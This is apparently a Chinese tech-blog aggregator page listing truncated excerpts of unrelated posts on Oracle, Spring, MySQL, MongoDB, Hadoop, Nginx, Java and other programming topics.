oracle_执行计划_谓词信息和数据获取(上) 一：简要说明在查看执行计划的信息中，经常会看到两个谓词filter和access，它们的区别是什么，理解了这两个词对我们解读Oracle的执行计划信息会有所帮助。简单说，执行计划如果显示是access，就表示这个谓词条件的值将会影响数据的访问路径（表还是索引），而filter表示谓词条件的值并不会影响数据访问路径，只起到
spring中datasource配置 g21121 dataSource
datasource配置有很多种，我介绍的一种是采用c3p0的，它的百科地址是： http://baike.baidu.com/view/920062.htm  <bean name="propertiesConfig" class="org.springframework.b
web报表工具FineReport使用中遇到的常见报错及解决办法（三）老A不折腾 finereport FAQ 报表软件
这里写点抛砖引玉，希望大家能把自己整理的问题及解决方法晾出来，Mark一下，利人利己。出现问题先搜一下文档上有没有，再看看度娘有没有，再看看论坛有没有。有报错要看日志。下面简单罗列下常见的问题，大多文档上都有提到的。 1、repeated column width is largerthan paper width：这个看这段话应该是很好理解的。比如做的模板页面宽度只能放
mysql 用户管理墙头上一根草 linux mysql user
1.新建用户 //登录MYSQL@>mysql -u root -p@>密码//创建用户mysql> insert into mysql.user(Host,User,Password) values(‘localhost’,'jeecn’,password(‘jeecn’));//刷新系统权限表mysql>flush privileges;这样就创建了一个名为：
关于使用Spring导致c3p0数据库死锁问题 aijuans spring Spring 入门 Spring 实例 Spring3 Spring 教程
这个问题我实在是为整个 springsource 的员工蒙羞如果大家使用 spring 控制事务，使用 Open Session In View 模式， com.mchange.v2.resourcepool.TimeoutException: A client timed out while waiting to acquire a resource from com.mchange.
百度词库联想 annan211 百度
<!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>RunJS</title&g
int数据与byte之间的相互转换实现代码百合不是茶位移 int转byte byte转int 基本数据类型的实现
在BMP文件和文件压缩时需要用到的int与byte转换,现将理解的贴出来; 主要是要理解;位移等概念 http://baihe747.iteye.com/blog/2078029 int转byte; byte转int; /** * 字节转成int,int转成字节 * @author Administrator *
简单模拟实现数据库连接池 bijian1013 java thread java多线程简单模拟实现数据库连接池
简单模拟实现数据库连接池实例1： package com.bijian.thread; public class DB { //private static final int MAX_COUNT = 10; private static final DB instance = new DB(); private int count = 0; private i
一种基于Weblogic容器的鉴权设计 bijian1013 java weblogic
服务器对请求的鉴权可以在请求头中加Authorization之类的key，将用户名、密码保存到此key对应的value中，当然对于用户名、密码这种高机密的信息，应该对其进行加砂加密等，最简单的方法如下： String vuser_id = "weblogic"; String vuse
【RPC框架Hessian二】Hessian 对象序列化和反序列化 bit1129 hessian
任何一个对象从一个JVM传输到另一个JVM，都要经过序列化为二进制数据(或者字符串等其他格式，比如JSON)，然后在反序列化为Java对象，这最后都是通过二进制的数据在不同的JVM之间传输(一般是通过Socket和二进制的数据传输)，本文定义一个比较符合工作中。 1. 定义三个POJO Person类 package com.tom.hes
【Hadoop十四】Hadoop提供的脚本的功能 bit1129 hadoop
1. hadoop-daemon.sh 1.1 启动HDFS ./hadoop-daemon.sh start namenode ./hadoop-daemon.sh start datanode 通过这种逐步启动的方式，比start-all.sh方式少了一个SecondaryNameNode进程，这不影响Hadoop的使用，其实在 Hadoop2.0中，SecondaryNa
中国互联网走在“灰度”上 ronin47 管理灰度
中国互联网走在“灰度”上（转）文/孕峰第一次听说灰度这个词，是任正非说新型管理者所需要的素质。第二次听说是来自马化腾。似乎其他人包括马云也用不同的语言说过类似的意思。灰度这个词所包含的意义和视野是广远的。要理解这个词，可能同样要用“灰度”的心态。灰度的反面，是规规矩矩，清清楚楚，泾渭分明，严谨条理，是决不妥协，不转弯，认死理。黑白分明不是灰度，像彩虹那样
java-51-输入一个矩阵，按照从外向里以顺时针的顺序依次打印出每一个数字。 bylijinnan java
public class PrintMatrixClockwisely { /** * Q51.输入一个矩阵，按照从外向里以顺时针的顺序依次打印出每一个数字。例如：如果输入如下矩阵： 1 2 3 4 5 6 7 8 9
mongoDB 用户管理开窍的石头 mongoDB用户管理
1:添加用户第一次设置用户需要进入admin数据库下设置超级用户（use admin） db.addUsr({user:'useName',pwd:'111111',roles:[readWrite,dbAdmin]}); 第一个参数用户的名字第二个参数
[游戏与生活]玩暗黑破坏神3的一些问题 comsci 生活
暗黑破坏神3是有史以来最让人激动的游戏。。。。但是有几个问题需要我们注意玩这个游戏的时间，每天不要超过一个小时，且每次玩游戏最好在白天结束游戏之后，最好在太阳下面来晒一下身上的暗黑气息，让自己恢复人的生气 &nb
java 二维数组如何存入数据库 cuiyadll java
using System; using System.Linq; using System.Text; using System.Windows.Forms; using System.Xml; using System.Xml.Serialization; using System.IO; namespace WindowsFormsApplication1 {
本地事务和全局事务Local Transaction and Global Transaction(JTA) darrenzhu java spring local global transaction
Configuring Spring and JTA without full Java EE http://spring.io/blog/2011/08/15/configuring-spring-and-jta-without-full-java-ee/ Spring doc -Transaction Management http://docs.spring.io/spri
Linux命令之alias - 设置命令的别名，让 Linux 命令更简练 dcj3sjt126com linux alias
用途说明设置命令的别名。在linux系统中如果命令太长又不符合用户的习惯，那么我们可以为它指定一个别名。虽然可以为命令建立“链接”解决长文件名的问题，但对于带命令行参数的命令，链接就无能为力了。而指定别名则可以解决此类所有问题【1】。常用别名来简化ssh登录【见示例三】，使长命令变短，使常用的长命令行变短，强制执行命令时询问等。常用参数格式：alias 格式：ali
yii2 restful web服务[格式响应] dcj3sjt126com PHP yii2
响应格式当处理一个 RESTful API 请求时，一个应用程序通常需要如下步骤来处理响应格式：确定可能影响响应格式的各种因素，例如媒介类型，语言，版本，等等。这个过程也被称为 content negotiation。资源对象转换为数组，如在 Resources 部分中所描述的。通过 [[yii\rest\Serializer]]
MongoDB索引调优（2）——[十] eksliang mongodb MongoDB索引优化
转载请出自出处：http://eksliang.iteye.com/blog/2178555 一、概述上一篇文档中也说明了，MongoDB的索引几乎与关系型数据库的索引一模一样，优化关系型数据库的技巧通用适合MongoDB，所有这里只讲MongoDB需要注意的地方二、索引内嵌文档可以在嵌套文档的键上建立索引，方式与正常
当滑动到顶部和底部时，实现Item的分离效果的ListView gundumw100 android
拉动ListView，Item之间的间距会变大，释放后恢复原样； package cn.tangdada.tangbang.widget; import android.annotation.TargetApi; import android.content.Context; import android.content.res.TypedArray; import andr
程序员用HTML5制作的爱心树表白动画 ini JavaScript jquery Web html5 css
体验效果：http://keleyi.com/keleyi/phtml/html5/31.htmHTML代码如下： <!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"><head><meta charset="UTF-8" > <ti
预装windows 8 系统GPT模式的ThinkPad T440改装64位 windows 7旗舰版 kakajw ThinkPad 预装改装 windows 7 windows 8
该教程具有普遍参考性，特别适用于联想的机器，其他品牌机器的处理过程也大同小异。该教程是个人多次尝试和总结的结果，实用性强，推荐给需要的人！缘由小弟最近入手笔记本ThinkPad T440，但是特别不能习惯笔记本出厂预装的Windows 8系统，而且厂商自作聪明地预装了一堆没用的应用软件，消耗不少的系统资源（本本的内存为4G，系统启动完成时，物理内存占用比
Nginx学习笔记 mcj8089 nginx
一、安装nginx 1、在nginx官方网站下载一个包，下载地址是： http://nginx.org/download/nginx-1.4.2.tar.gz 2、WinSCP(ftp上传工
mongodb 聚合查询每天论坛链接点击次数 qiaolevip 每天进步一点点学习永无止境 mongodb 纵观千象
/* 18 */ { "_id" : ObjectId("5596414cbe4d73a327e50274"), "msgType" : "text", "sendTime" : ISODate("2015-07-03T08:01:16.000Z"
java术语（PO/POJO/VO/BO/DAO/DTO） Luob. DAO POJO DTO po VO BO
PO(persistant object) 持久对象在o/r 映射的时候出现的概念,如果没有o/r映射,就没有这个概念存在了.通常对应数据模型(数据库),本身还有部分业务逻辑的处理.可以看成是与数据库中的表相映射的java对象.最简单的PO就是对应数据库中某个表中的一条记录,多个记录可以用PO的集合.PO中应该不包含任何对数据库的操作. VO(value object) 值对象通
算法复杂度 Wuaner Algorithm
Time Complexity & Big-O： http://stackoverflow.com/questions/487258/plain-english-explanation-of-big-o http://bigocheatsheet.com/ http://www.sitepoint.com/time-complexity-algorithms/